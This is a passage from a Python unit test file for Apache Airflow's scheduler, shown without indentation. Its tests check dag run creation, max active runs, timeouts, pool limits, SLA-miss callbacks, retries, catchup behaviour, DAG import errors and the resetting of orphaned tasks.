subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
with create_session() as session:
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = state
ti.start_date = start_date
ti.end_date = end_date
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_without_tasks(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_without_tasks',
start_date=DEFAULT_DATE)
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
scheduler = SchedulerJob()
dag.clear(session=session)
dag.start_date = None
dr = scheduler.create_dag_run(dag, session=session)
self.assertIsNone(dr)
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs
has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has
been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEqual(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day
# ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='[email protected]',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now the executor has cleared and it should be allowed the re-queue,
# but tasks stay in the executor.queued_tasks after executor.heartbeat()
# will be set back to SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertIn(ti.state, [State.RUNNING, State.SUCCESS])
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
